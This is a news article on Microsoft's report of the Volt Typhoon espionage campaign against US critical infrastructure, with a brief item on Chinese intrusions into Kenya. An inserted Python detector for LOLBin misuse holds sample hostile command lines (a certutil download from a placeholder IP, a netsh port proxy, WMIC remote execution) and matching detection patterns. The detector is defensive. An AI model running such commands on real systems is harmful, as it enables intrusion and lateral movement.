Microsoft says it uncovered a cyber-espionage campaign aimed at critical infrastructure organizations in the United States. The tech giant has linked this malicious activity with “moderate confidence” to a China-linked state-backed threat actor it tracks as Volt Typhoon.
Active since at least mid-2021, the group is focused on espionage and information gathering and has been known to target critical infrastructure organizations in Guam and elsewhere in the US. As for the goal of the recent Volt Typhoon campaign, Microsoft believes it “is pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises.”
“In this campaign, the affected organizations span the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors. Observed behavior suggests that the threat actor intends to perform espionage and maintain access without being detected for as long as possible,” the company said in a blog post.
Initial access to targeted organizations is achieved via internet-facing Fortinet FortiGuard devices, although it’s currently unclear how the threat actor has breached the devices in the first place. The group then attempts to obtain credentials to an Active Directory account used by the device and compromise other devices in the network.
The attacker proxies all its network traffic to its targets via compromised SOHO network edge devices, including ASUS, Cisco, D-Link, NETGEAR, and Zyxel products. This allows the threat actor to enhance the stealth of its operations and lower the overhead costs of acquiring infrastructure.
Once in the network, Volt Typhoon uses “living-off-the-land” tactics with hands-on-keyboard activity and living-off-the-land binaries (LOLBins) such as PowerShell, Certutil, Netsh, and the Windows Management Instrumentation Command-line (WMIC).
The threat actor has also been observed using open-source tools, including Fast Reverse Proxy (frp), the Mimikatz credential-stealing tool, and the Impacket networking framework, according to a joint advisory published by the cybersecurity agencies from the US, Australia, New Zealand, the United Kingdom, and Canada.
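As an added illustration (not from the article, Microsoft's report or the joint advisory): a small Python detector that applies the LOLBin observations above to constructed process-creation events and flags argument patterns associated with download, port forwarding and remote execution. The event fields, rule names and sample command lines are assumptions of this example.

```python
import re

# Constructed sample process-creation events (Sysmon-style fields); not taken from the article.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-ChildItem C:\\Users"},
    {"host": "ws01", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt"},
    {"host": "srv02", "parent": "cmd.exe", "image": "netsh.exe",
     "cmdline": "netsh.exe interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.7 connectport=443"},
    {"host": "srv02", "parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": 'wmic.exe /node:10.0.0.9 process call create "cmd.exe /c whoami"'},
    {"host": "ws03", "parent": "svchost.exe", "image": "netsh.exe",
     "cmdline": "netsh.exe wlan show profiles"},
]

# Argument-level heuristics for the LOLBins the article names. Admin use of these
# binaries is routine, so matching on the binary name alone would only produce noise.
LOLBIN_RULES = {
    "certutil.exe": [("certutil_download", re.compile(r"-urlcache|https?://", re.I)),
                     ("certutil_decode", re.compile(r"-decode\b", re.I))],
    "netsh.exe": [("netsh_portproxy", re.compile(r"\bportproxy\b.*\badd\b", re.I))],
    "wmic.exe": [("wmic_remote_exec", re.compile(r"/node:\S+.*process\s+call\s+create", re.I))],
    "powershell.exe": [("powershell_encoded",
                        re.compile(r"-(?:e|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{40,}", re.I))],
}

def detect(events):
    """Return one finding per (event, matching rule), in input order."""
    findings = []
    for ev in events:
        for name, pattern in LOLBIN_RULES.get(ev["image"].lower(), []):
            if pattern.search(ev["cmdline"]):
                findings.append({"host": ev["host"], "image": ev["image"],
                                 "parent": ev["parent"], "rule": name})
    return findings

def summarize_by_host(findings):
    """Group rule hits per host: several different LOLBin hits on one host is the
    hands-on-keyboard pattern worth escalating; a single hit often is not."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["rule"])
    return {h: sorted(r) for h, r in by_host.items()}

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for h in hits:
        print(f'{h["host"]}: {h["image"]} (parent {h["parent"]}) matched {h["rule"]}')
    print(summarize_by_host(hits))
```

The benign PowerShell and `netsh wlan` events produce no findings; the two hits on srv02 together are the kind of chain that merits a closer look at that host.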
Earlier this week, Reuters reported that, in a cyber-espionage operation spanning several years, Chinese hackers targeted the Kenyan government in an attempt to obtain information on the country's mounting debt owed to Beijing.
The report notes that between 2000 and 2020, China committed nearly $160 billion in loans to African countries. Kenya used over $9 billion in Chinese loans to fund an aggressive push to build or upgrade railways, ports and highways.
According to sources familiar with the matter, Chinese cyber intrusions began in late 2019 and continued to at least 2022, targeting the office of Kenya's president, its defense, information, health, land and interior ministries, its counter-terrorism center and other institutions.